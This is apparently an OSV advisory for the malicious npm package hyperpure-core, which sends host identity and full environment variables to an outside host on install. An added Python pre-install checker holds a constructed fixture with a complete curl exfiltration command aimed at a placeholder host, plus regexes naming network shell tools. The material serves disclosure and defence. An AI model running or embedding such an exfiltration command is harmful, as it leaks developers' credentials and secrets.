MAL-2026-6250

Import Source
https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/hyperpure-core/MAL-2026-6250.json
JSON Data
https://api.osv.dev/v1/vulns/MAL-2026-6250
Published
2026-06-21T16:21:08Z
Modified
2026-06-24T03:31:23.576135478Z
Summary
Malicious code in hyperpure-core (npm)
Details

Source: amazon-inspector (47dd43b980c7b5e3230ee57e6974d40804e54997ed88877ced301402dbcdef4c)

The package impersonates a Zomato internal namespace (name hyperpure-core, repository URL pointing to github.com/zomato/hyperpure-core) while shipping a 63-byte stub index.js that exports nothing functional. The package.json preinstall (and preuninstall) lifecycle script runs at npm install time and uses curl to POST the output of hostname -f and whoami, the current working directory, and the full env output (base64-encoded) to http://d8s0b82plbq3u5sb2vo0sb3a9obr4yjt7.oast.site over plaintext HTTP. On CI and developer machines the captured environment routinely contains credential-grade values (AWS_*, NPM_TOKEN, GH_TOKEN, CI provider secrets), so this is unambiguous installer-side credential and host-identity exfiltration. The shape (internal-name impersonation + hollow module + env-leaking preinstall + OAST out-of-band callback) is a textbook dependency-confusion attack against Zomato build infrastructure.
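A pre-install gate for the lifecycle-script shape described above, as an added example that is not part of the OSV record, the OpenSSF Package Analysis tooling or Amazon Inspector. The package.json fixture is constructed to mirror the advisory, the callback host is a placeholder, and the rule set is a heuristic, not a list the page provides.

```python
"""Heuristic check for installer-side exfiltration in npm lifecycle scripts.
Input is a package.json string; the fixture at the bottom is constructed to
mirror the shape in this advisory, with a placeholder callback host."""
import json
import re

# Hooks npm runs automatically during install / uninstall.
LIFECYCLE_HOOKS = {"preinstall", "install", "postinstall", "prepare",
                   "preuninstall", "uninstall", "postuninstall"}

# (label, pattern). One hit is only a hint (e.g. `env` also matches cross-env);
# a finding needs a network client plus something worth sending.
RULES = [
    ("network_client", re.compile(r"\b(curl|wget|nc|ncat)\b")),
    ("env_dump", re.compile(r"\b(env|printenv)\b|process\.env")),
    ("host_identity", re.compile(r"\b(hostname|whoami|pwd)\b")),
    ("encoding", re.compile(r"\b(base64|xxd)\b")),
    ("plain_http", re.compile(r"http://")),
]


def audit_lifecycle_scripts(package_json: str) -> list[dict]:
    """Return one finding per lifecycle hook that looks like exfiltration."""
    scripts = json.loads(package_json).get("scripts", {})
    findings = []
    for hook, cmd in scripts.items():
        if hook not in LIFECYCLE_HOOKS:
            continue  # build/test scripts do not run on `npm install`
        hits = [label for label, rx in RULES if rx.search(cmd)]
        if "network_client" in hits and ("env_dump" in hits or "host_identity" in hits):
            findings.append({"hook": hook, "indicators": hits, "script": cmd})
    return findings


# Constructed fixture: the advisory's preinstall shape, placeholder host.
SAMPLE_MALICIOUS = json.dumps({
    "name": "hyperpure-core",
    "version": "1.0.0",
    "scripts": {
        "preinstall": "curl -s -X POST --data-binary "
                      "\"$(hostname -f);$(whoami);$(pwd);$(env | base64)\" "
                      "http://oast.example.invalid/",
        "test": "node test.js",
    },
})

if __name__ == "__main__":
    for f in audit_lifecycle_scripts(SAMPLE_MALICIOUS):
        print(f"{f['hook']}: {', '.join(f['indicators'])}")
```

Run it against an unpacked tarball's package.json before `npm install` in CI; a non-empty result is a reason to stop the job, and pairing it with `npm install --ignore-scripts` removes the execution path entirely.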

Source: ossf-package-analysis (1646c4910046d5c497ba97d75067f1b566f5bfe79ba938e0b9d06eda3b2eefa3)

The OpenSSF Package Analysis project identified 'hyperpure-core' @ 1.0.0 (npm) as malicious.

It is considered malicious because:

  • The package communicates with a domain associated with malicious activity.

  • The package executes one or more commands associated with malicious behavior.

Database specific
{
    "malicious-packages-origins": [
        {
            "sha256": "1646c4910046d5c497ba97d75067f1b566f5bfe79ba938e0b9d06eda3b2eefa3",
            "import_time": "2026-06-21T16:38:03.237191602Z",
            "source": "ossf-package-analysis",
            "modified_time": "2026-06-21T16:21:08Z",
            "versions": [
                "1.0.0"
            ]
        },
        {
            "sha256": "47dd43b980c7b5e3230ee57e6974d40804e54997ed88877ced301402dbcdef4c",
            "import_time": "2026-06-24T03:14:01.550177186Z",
            "source": "amazon-inspector",
            "modified_time": "2026-06-24T02:44:54Z",
            "versions": [
                "1.0.0"
            ],
            "id": "IN-MAL-2026-007399"
        }
    ]
}

Affected packages

npm / hyperpure-core

Package: npm / hyperpure-core
Affected ranges: 1.*
Affected versions: 1.0.0

Database specific

source
"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/hyperpure-core/MAL-2026-6250.json"
cwes
[
    {
        "name": "Embedded Malicious Code",
        "description": "The product contains code that appears to be malicious in nature.",
        "cweId": "CWE-506"
    }
]
indicators
{
    "evidence_files": [
        {
            "sha256": "8274b3c72accc032639be59965255437eeca7b6f02b4c151f552442248c85405",
            "tlsh": "8901c924693896b33d9c4a70ba2a406d7a617f0f84fc2c005e9b111d828f215232d72b",
            "path": "package.json"
        }
    ],
    "package_integrity": [
        {
            "filename": "hyperpure-core-1.0.0.tgz",
            "hashes": {
                "sha1": "f838ff03ee730fed3168e840e4245273472a4139",
                "sha512_sri": "sha512-U0hVw+RveRgu1Ud8p4SUeWFa1qlGEA/mZv4Sx49OHNHRdRJyMfpz31B61JcsSN8AtpLlgdlTBNqpbo2tDZWAKw=="
            }
        }
    ]
}